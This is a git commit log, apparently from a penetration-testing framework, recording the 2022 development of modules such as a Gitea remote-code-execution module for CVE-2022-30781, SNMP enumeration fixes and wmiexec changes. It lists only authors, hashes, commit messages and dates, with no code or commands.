krastanoel	f0b67c8812	fix msftidy	2022-11-08 14:14:45 +07:00
krastanoel	540984804d	Apply suggestions from code review Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>	2022-11-08 14:09:31 +07:00
h00die-gr3y	da189041b4	randomized endpoint url	2022-11-07 08:16:54 +00:00
h00die-gr3y	bf0ed5b513	fixed some typos in documentation	2022-11-05 15:36:42 +00:00
h00die-gr3y	642a83bd0d	Updated module and added documentation	2022-11-05 15:14:31 +00:00
h00die-gr3y	71d1c971a7	init commit module	2022-11-04 13:31:27 +00:00
ErikWynter	771b66f570	update fork and rebase feature branch	2022-11-03 12:07:08 +02:00
ErikWynter	0065cff169	add rescuing for SNMP::ParseError to snmp enum modules	2022-11-03 12:04:33 +02:00
Jack Heysel	d6f27a8a71	Used vuln to remove test webshell in check method	2022-10-24 14:17:21 -04:00
Jack Heysel	11936affd1	Rubocop	2022-10-19 22:07:50 -04:00
Jack Heysel	b60b440697	Check method improvement	2022-10-19 22:03:43 -04:00
Matthew Dunn	4cda8a9d23	Add hashes and better error handling to wmiexec	2022-10-15 16:42:30 -04:00
krastanoel	95503be49a	Update documentation	2022-10-03 19:57:25 +07:00
krastanoel	bd15798be7	support windows platform	2022-10-03 19:57:09 +07:00
krastanoel	aa0dc86bd8	get csrf from the html body instead	2022-10-01 19:59:23 +07:00
krastanoel	e3fc3544cd	still could not yet support windows	2022-10-01 17:44:44 +07:00
krastanoel	02b5f8678c	add repository error class	2022-10-01 17:43:42 +07:00
krastanoel	e9d8068078	update and tidy the lib comments	2022-10-01 16:22:21 +07:00
krastanoel	15c956c2d6	Update module - add command stagers logic - set default uripath	2022-10-01 16:19:43 +07:00
krastanoel	046bb356fb	adjust uripath	2022-10-01 15:17:28 +07:00
krastanoel	2331f21f9e	Update module - adjust create, migrate and delete repository with the common lib	2022-10-01 01:16:18 +07:00
krastanoel	cc2db82886	add repository create and migrate helpers	2022-10-01 01:13:28 +07:00
krastanoel	29944a0a1b	add repository create and migrate url	2022-10-01 01:12:54 +07:00
krastanoel	c5d3867980	add migration error class	2022-10-01 01:11:58 +07:00
krastanoel	88e4261a88	Add common lib for Gitea repository	2022-10-01 01:10:55 +07:00
krastanoel	953221d518	Handle datastore username empty string	2022-09-30 22:23:40 +07:00
krastanoel	381bdbae7f	Update module - adjust check method using common lib - handle autocheck false	2022-09-30 22:14:45 +07:00
krastanoel	cbff63958c	Move version check and login to common library	2022-09-30 22:09:01 +07:00
krastanoel	36f3a7ce11	update options description	2022-09-30 16:57:59 +07:00
krastanoel	7e46ba4575	use fail with instead checkcode	2022-09-30 16:50:34 +07:00
krastanoel	e1284ea17d	handle get_csrf check caller separately	2022-09-30 16:45:49 +07:00
krastanoel	60569b8b97	Add Gitea Git fetch RCE module - CVE-2022-30781	2022-09-15 19:43:12 +07:00